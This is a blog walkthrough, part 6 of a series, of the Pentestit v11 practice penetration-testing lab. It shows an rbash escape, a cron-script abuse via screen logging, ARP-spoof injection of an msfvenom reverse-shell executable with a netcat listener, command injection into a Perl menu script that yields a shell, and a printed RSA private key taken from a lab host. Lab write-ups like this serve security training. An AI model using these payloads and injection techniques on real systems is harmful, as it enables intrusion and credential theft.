Innogen security

RECENT BLOG

Posted in Blog post

Pentestit lab v11 Guide Part 6

 

Site 1 192.168.10/11/12 networks

Testing all the ssh connections across the .10 and .11 network for user john using the password found on helpdesk we are back to the helpdesk server 11.3.

 

root@kali:~/vpn$ ssh john@192.168.11.3
The authenticity of host '192.168.11.3 (192.168.11.3)' can't be established.
ECDSA key fingerprint is SHA256:eCUUbPi982duUnl4Z2icxjpvjroDyEr/7Q567c6j0gs.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.11.3' (ECDSA) to the list of known hosts.
john@192.168.11.3's password: 
Last login: Wed Jul 12 16:55:54 2017 from 192.168.11.254
##########################
PasswordAuthentication no
        PasswordAuthentication yes
##########################
john@tl11-192-168-11-3:~$

 

SCREEN – 192.168.11.3:

Trying to enumerate this host and testing autocomplete in the shell throws errors and shows us we are in a jail shell:

 

john@tl11-192-168-11-3:~$ ls -al
total 28
drwxr-xr-x 2 root root 4096 Jul  5 15:39 .
drwxr-xr-x 4 root root 4096 Jun 24 14:23 ..
-r-------- 1 root root    0 Jul  5 15:39 .bash_history
-r--r--r-- 1 root root  220 Apr 20 22:09 .bash_logout
-r--r--r-- 1 root root 3515 Apr 20 22:09 .bashrc
-r-------- 1 root root   44 Jun 24 15:32 .lesshst
-r--r--r-- 1 root root  675 Apr 20 22:09 .profile
-r-------- 1 root root 3954 Jul  5 15:39 .viminfo
john@tl11-192-168-11-3:~$ cat .lesshst
cat: .lesshst: Permission denied
john@tl11-192-168-11-3:~$ cat -rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a2': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier

It appears from the env command we are in an rbash (restricted bash) shell, this is one of the easiest to break out of and I execute the following to enter a bash shell and break out of Jail:

 

john@tl11-192-168-11-3:~$ python -c "import pty;pty.spawn('/bin/bash')"
##########################
PasswordAuthentication no
        PasswordAuthentication yes
##########################
john@tl11-192-168-11-3:~$

After a great deal of enumeration we find this line in the /etc/crontab file:

 

## Check
*  * 	* * *	tester	/home/tester/check.pl /build/log/*

Enumerating this directory we find log is empty and the root /build directory has the source files for the screen binary, its noted here that the screen binary had the gid set for the utmp user:

In order to write to the /build/log dir we need to write a file as the utmp user as seen below, which means in order exploit the cronjob we will need to escalate to the utmp user; this is further dependant on the script source.

 

john@tl11-192-168-11-3:~$ ls -al /build/log/
total 8
drwxrwxr-x 2 root utmp 4096 Jul 12 16:57 .
drwxr-xr-x 4 root root 4096 Jun 24 17:07 ..

We now look at the script found in the crontab: /home/tester/check.pl:

 

#!/usr/bin/perl -w

if (!-l $ARGV[0] && -f $ARGV[0]) {

	open $file1, $ARGV[0];
	$fname = <$file1>;
	chomp($fname);

	open ($file2, $fname) or die("$!");
	open $file3, '>>', "/tmp/testlog";
	$line = <$file2>;

	chomp ($line);
	print $file3 $line, "\n";
	
	close $file2;
	close $file3;
	close $file1;
	unlink($ARGV[0]);

	sleep(1);
	open $file1, '>', "/tmp/testlog";
	close $file1;

}
else {
	exit(0);
}

Researching the perl script we find that the script reads a file from /build/log, then reads the file line in as a variable then the print command writes the line into /tmp/testlog then deletes (unlink) the file from the /build/log dir,  so we can potentially write a log file to /build/log containing a filename ie token and hopefully we can leverage this to read out the token into the /tmp/testlog.

A great deal of research later we find its possible to use the screen binary to output a log file to a specified location:

man screen: -L            Turn on output logging.

We can now do the following:

  • Execute the sgid binary with the -L switch to /build/log and detach with: ctrl a + d
  • chmod the log file to ensure no permissions issues are seen
  • echo our file path into the log file
  • run a loop to watch the /tmp/testlog file as shown and successfully we gain the Screen TOKEN.

 

ROUTER:

In front of the 3 subnetworks is the router 252 which we have access to via our morgan user and rsa key, however it would be useful to find something to allow us to navigate and scan the networks without proxychains which can be combersome, upon asking around i was pointed to sshuttle which allows us to map multiple networks over ssh using the following command:

sshuttle -r morgan@172.16.0.252 -e “ssh -i ~/pentestit/morgan.key” 192.168.10.0/24 192.168.11.0/24 192.168.12.0/24

 

DIRECTOR – 192.168.12.2:

On connecting to the interceptor NG machine with the credentials obtained from the AD files share, we proceed to look around in order to find the interceptor software which is located in C:\Soft:

 

Its worth noting we also have an netcat binary here which may be useful…

Firing up Interceptor we conduct a quick scan of the subnet and setup up our target, gateway and stealth servers, as the initial enumeration of this subnet did not yield a mass of information we work in a logical fashion and set the following options:

  • Target: 192.168.12.1 – reason its the first IP in the subnet.
  • Gateway: 192.168.12.3 – reason its because its a known host in the subnetwork
  • Stealth: 192.168.12.4 – reason this showed up on the scan and was not on the lab map so assume this is the stealth host to use for our MIM attack.

NB: The following video will help understand Interceptor:

We now start our arp spoofing/MiM attack on the subnet and navigate to the raw tab to view the traffic in wireshark format. First of all we end up with a mass of rdp session data from our own connection so we need to filter this out.

In order to do this we stop the spoof, navigate to raw and input the following in the bottom left pcap filter: not port 3389

Once done we head back and start the spoof then go make coffee :D, once back we review the captures and start looking for the obvious information first ie ftp or http connections.

After reading through quite a number of dead end http requests we find one that stands out: a repeated GET request for a binary quake3.exe which is returning a 404 response.

Based on this we can potentially provide our victim with a quake3.exe binary ensuring this is a msfvenom reverse shell:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.12.2 LPORT=80 -f exe > quake3.exe

In order to transfer this rather than reconnect to rdp and potentially lose my spot for a competing connection I created a file share on the interceptor host and used smbclient from my kali machine in order to transfer the quake3.exe file to the interceptor machine.

Once there I proceed to do the following:

  • Select MiM attacks, check the SSL Strip option and OK to close
  • Select Injection and provide the following values:
    • pattern: quake3
    • content type drop down: application/octet-stream
    • count: 10
    • user-agent: *
    • Add: select the reverse shell binary

We start netcat on our machine listening on port 80 as per the msfvenom command:

nc.exe -nlvp 80

then proceed to start the arp injection again while waiting for our injection method to spawn our reverse shell, which did not take long at all..

Navigating around the 192.168.12.1 machine we find this belongs to the Director, we find a public key and the token in the director’s documents folder:

Public Key:

Now we have another ssh key and username we can use:

ssh remote@192.168.11.1 -i ~/pentestit/remote_pub.key

NOTE: Before exiting the interceptor host enumerate the user/documents directory where a todo.txt is found containing a number crontab entries:

 

Run this scripts to check locked accounts requlary
Garry said somthing about ftp server moving...need to correct script parameter when it's done.
!!!ASK on Monday!!!

# m h  dom mon dow   command
*/2 * * * * su - checker -c 'python /home/checker/ftpclient.py 192.168.11.18 2030 5 user password' > /dev/null 2>&1
*/3 * * * * su - checker -c 'python /home/checker/ftpclient.py 192.168.10.1 2020 5 user password' > /dev/null 2>&1
*/4 * * * * su - checker -c 'python /home/checker/httpclient.py 172.16.0.11 80 5 user password' > /dev/null 2>&1
*/5 * * * * su - checker -c 'python /home/checker/httpclient.py 172.16.0.11 88 5 user password' > /dev/null 2>&1
*/6 * * * * su - checker -c 'python /home/checker/ftpclient.py 172.16.0.16 2010 5 user password' > /dev/null 2>&1
*/7 * * * * su - checker -c 'python /home/checker/httpclient.py 172.16.0.17 80 5 user password' > /dev/null 2>&1

 

REMOTE – 192.168.11.1:

Using the public key found we connect to remote and are presented with an options screen  and selecting the 2 options Srv 1 and Srv2 provides us with 2 differing results:

  • Srv1: allows us in as user “aengineer” so i make note of this for future use if required.
  • Srv2: just gives us a blank page so a dead end

 

root@kali:~/pentestit$ ssh remote@192.168.11.1 -i remote.11.1.key 
########################################
Enter ServerName or Q for exit:
########################################
Srv1
Srv2
########################################
Enter VM name for connect: Srv1
Connecting to server …
Last login: Tue Jul  4 23:07:52 2017 from 192.168.11.1
##########################
PasswordAuthentication no
##########################
idaengineer@tl11-172-16-0-16:~$ id
uid=1001(aengineer) gid=1001(aengineer) groups=1001(aengineer)
aengineer@tl11-172-16-0-16:~$ 

Connection to 172.16.0.16 closed.
########################################
Enter ServerName or Q for exit:
########################################
Srv1
Srv2
########################################
Enter VM name for connect: Srv2
Connecting to server ...

I accidentally make a typo in the options screen and notice an error message and start attempting redirection of stdout and stderr and find command injection is available:
NOTE: I have truncated this as my attempts where much more involved and this link proved very useful:
https://unix.stackexchange.com/questions/164217/write-to-stderr

 

Enter VM name for connect: Srv3
cat: /opt/gh/Srv3: No such file or directory
########################################
Enter ServerName or Q for exit:
########################################
Srv1
Srv2
########################################
Enter VM name for connect: 
Enter VM name for connect: Srv3;id>/dev/null
cat: /opt/gh/Srv3: No such file or directory
########################################
Enter ServerName or Q for exit:
########################################
Srv1
Srv2
########################################
Enter VM name for connect: Srv3; id 1>&2
cat: /opt/gh/Srv3: No such file or directory
uid=1000(remote) gid=1000(remote) groups=1000(remote)

attempting to execute /bin/sh and /bin/bash returned no results however /bin/dash produced a shell:

 

########################################
Enter ServerName or Q for exit:
########################################
Srv1
Srv2
########################################
Enter VM name for connect: Srv3; /bin/dash 1&>2
cat: /opt/gh/Srv3: No such file or directory
sh: 1: cannot create 2: Permission denied
/bin/dash: 0: Can't open 1
########################################
Enter ServerName or Q for exit:
########################################
Srv1
Srv2
########################################
Enter VM name for connect: Srv3;/bin/dash 1>&2
cat: /opt/gh/Srv3: No such file or directory
$ ls -al

total 28
drwxr-xr-x 3 root remote 4096 Jun 29 18:17 .
drwxr-xr-x 3 root root   4096 Jun 30 16:41 ..
-rw------- 1 root remote  252 Jun 29 18:57 .bash_history
-rw-r--r-- 1 root remote  220 Dec 30  2012 .bash_logout
-rw-r--r-- 1 root remote 3515 Nov  6  2016 .bashrc
-rw-r--r-- 1 root remote  675 Dec 30  2012 .profile
drwxr-x--- 2 root remote 4096 Jul  5 00:40 .ssh

SSH KEY Found:

 

$ $ ls -al .ssh	
total 24
drwxr-x--- 2 root   remote 4096 Jul  5 00:40 .
drwxr-xr-x 3 root   remote 4096 Jun 29 18:17 ..
-r-x------ 1 remote root    938 Jul  6 17:19 authorized_keys
-r-x------ 1 remote root   1679 Jun 29 18:15 id_rsa
-r-x------ 1 remote root    406 Jun 29 18:15 id_rsa.pub
-r-x------ 1 remote root    444 Jul  5 00:41 known_hosts
$ cat .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA0xrDWTXXzq18+mTF7hoAFI9ZPoQKItWEUb/1k8sP2I652Po3
Ky3LEGDDlKwIgZGPJbo3CKSSA59e2cOkSWvFIC9qnWQHrWrs6uNDBbVLVxavopdW
/N9aXuhNa/pES18lRnrfrtwmAgYYc7q8IyMy1sO0diXCNunKLqwbGjpvYz1x1xqS
u01280uO6u5JZ0TWSvsRWIOVbyypMiz4d0UdM+XbGSh8gJGtiZDao80wMIeuEeHf
TgNJa/iInaVyKOpV2l8S4b7Opkw0hYSGOUAJqFlfZoILU2yO1+ibCOupFoM/GihH
deFkiKZyrJ7P5bnJK4gaRU8+R1H81oO8ktUL/wIDAQABAoIBACTnm9j/qa+O8rdP
YK7EStlNShu8t4zpaM1l0oe4yxdftCuzamuZANPnJqnZ/U6xZKYCzNYs9v29IbbO
Fe1j8r0yrN/A+fqeI7bYbgIUdIxQAfpZnLJuVX0b/VTwFnpassiEeJA4GkjmSeYJ
chRuddfHtMemyDITYu4P1lkaeBiP9uV3VRoUSBPuxLLqKbXdCu3pnmjuL1CtO5WY
ZvgWa9Ss1q6IS5f6mtCAMGf6QhxNmi04uUDXxsQvw2nCsHIBCuw2xbSqYyI87ARZ
FvjlNMx2Jl1JMbFuaggHr3TTdnynFJjYYg5gMgbiz1h3OlNBjttMyTa6hjKoxa7Q
r6GogqECgYEA9wdgQpPbYpB6p2KXpMf4/7o3XdHabfmM0cCXDKZO2n56mkCGEVqY
9aN2CnQzVMiTujP4d9/VOEhGrKsZ75f5bnyBcO27C/b7bAQR7c48ZsCrkac8JNn1
HdW0us9gc0xQQdOHAP06Dp0J+jaBXBcqs8Eq2DzEeNOOKBSS0a80FzECgYEA2sVm
SQ/L8gP3qGqrC9pV8USf8WhkpAKmbWajHTV1W4JB8+2u83FyUkBxcdJdgLhJnEIg
8Q8xcx7bRbbWoJqa8kmPveVxrVqyLUXgAkOMyxC6DWWMN/kSuY0Oo6M8FN+5/R8D
hqClALgiITNFJAbHs68l/RyXQ3LCmDDq5Zuy6i8CgYB2kyHPk22BOFzHr/mebSbG
ibo93Jd+poTDwjA/MC01j/SFymcQOW6mqhnlFrX1Anp2rK+dyuFsLLVP+KlwaoCe
WkE/1b0tFxbEWIfKoG453E3+kkm6Xqzb71LbQOPJNF5p2oE5JlQR46uAYV1iuPQU
aKqKNVERtmrMLmPzJqhYYQKBgQCozXfHGDE9ZGJLyUKBus5lg5YGJ47AHmtcLr3d
Y8pR+Yf6N4Ouw/J6FM90C+Wp1Ii30S6p0hdNxJlciV/CPIkiOjB3TfsQz9J7rFbU
aFrStO1aOOigp8cS9Qw+p01MrfRMowmNb5bhnzJ2e6D102Vz98lQLCdrG7maxOP6
ltDOcQKBgQDM+6qhd8K2ZVzl+S4ANUcQg/WO4cWV4HGmKEh5O7YjBpGwpO4d47+z
NCa8IJu+tbG3whhCbir8YGmMP+6frlr/uT3el8S9UGd/DKOeKdD1p7bEd7IlGZjm
Y+nnLpKlWSnrnF1EVKpyap1KXkB4d8+Y/Aux40exmiaK0dayjMl9oA==
-----END RSA PRIVATE KEY-----

I decide to check out the directory seen in the error message during login:

cat: /opt/gh/Srv3: No such file or directory

 

$ ls -al /opt/gh/
total 20
drwxr-xr-x 2 root remote 4096 Jul  5 00:19 .
drwxr-xr-x 4 root remote 4096 Jun 29 18:58 ..
-rwxr-xr-x 1 root root   1273 Jul  7 09:29 gh.pl
-rw-r--r-- 1 root root     12 Jun 29 19:01 Srv1
-rw-r--r-- 1 root root     13 Jul  5 00:19 Srv2
$ cat /opt/gh/gh.pl
#!/usr/bin/perl

## USE
#use strict;
#use warnings;

## ENV
my $path = "/opt/gh/";
my $home = "/home/".`whoami`;
chomp($home);

## Go-go-go
while () {
# system("clear");
 print "########################################\n";
 print "Enter ServerName or Q for exit:\n";
 print "########################################\n";
 print "Srv1\n";
 print "Srv2\n";
 print "########################################\n";

 print "Enter VM name for connect: ";
 my $choice = <STDIN>;
 chomp ($choice);

 $choice =~ s/\.\.//g;
 $choice =~ s/(.*bash)|( sh|\/sh)//g;

 my $srv_conf	= $path.$choice;

 ## for right choice
 if ( "$choice" =~ /^Srv/ ) {
  ## Check that file exist
  if (( ! -e "$srv_conf") && ( "$choice" =~ /$home/ )) {
   my $srv_ip = `cat $srv_conf`;
   print "Server IP: $srv_ip";
   next; 
  }

  ## Get Srv IP from file
  my $srv_ip = `cat $srv_conf`;

  # Check Srv IP
  if ( "$srv_ip" =~ /^\d+\.\d+\.\d+\.\d+$/ ) {
 
   print "Connecting to server ...\n";

   ## SSH connect
   system("clear");

   ## and connect to server
   system("ssh -i /home/remote/.ssh/id_rsa -o StrictHostKeyChecking=no aengineer\@$srv_ip");
  }

 undef $choice;
 }
 ## for exit
 if (( "\U$choice" eq 'Q' ) || ( $choice eq 'quit') || ( $choice eq 'exit' )) { exit; }
}

system("logout");
exit;
$ ls -al /opt/scripts	
total 12
drwxr-xr-x 2 root remote 4096 Jun 30 11:17 .
drwxr-xr-x 4 root remote 4096 Jun 29 18:58 ..
-rwxr-xr-x 1 root remote   50 Apr 20  2016 upd.sh
$ cat /opt/scripts/upd.sh
#!/bin/bash

apt-get update && apt-get upgrade -y
$ ls -al/opt
ls: invalid option -- '/'
Try 'ls --help' for more information.
$ ls -al /opt
total 16
drwxr-xr-x  4 root remote 4096 Jun 29 18:58 .
drwxr-xr-x 22 root root   4096 Apr  1 22:18 ..
drwxr-xr-x  2 root remote 4096 Jul  5 00:19 gh
drwxr-xr-x  2 root remote 4096 Jun 30 11:17 scripts
$ ls -al /opt/gh/Srv1
-rw-r--r-- 1 root root 12 Jun 29 19:01 /opt/gh/Srv1
$ ls -al /opt/gh/Srv2
-rw-r--r-- 1 root root 13 Jul  5 00:19 /opt/gh/Srv2
$

From the perl script we find the connection string with the aengineer username:

 

## and connect to server
   system("ssh -i /home/remote/.ssh/id_rsa -o StrictHostKeyChecking=no aengineer\@$srv_ip");
  }

According the lab network diagram we have exploited most systems here minus the admin network and the access control system so armed with our new ssh user and key its time to infiltrate the admin network….

PART 7:

Innogen security

RECENT BLOG

Exploiting Sudo 1.8.27 The following brief is a quick demonstration of the issue faced by cve-2019-14287. This issue is presented when the user is allowed to run a specified command as any user other than the root user account, specified …

17 Oct 2019

SMB LFI Exploitation The following outlines a very short overview of LFI using SMB in form of a crib sheet. Install Samba: apt-get install samba Remove default Samba config: rm -f /etc/samba/smb.conf Create New smb.conf: vi /etc/samba/smb.conf The following config …

13 Oct 2019

Linux reverse shell without python. During a recent application exploit into an interactive shell the typical path to spawn a reverse shell and upgrade it to tty was sought. It was found that the go to technologies such as python, …

19 Sep 2019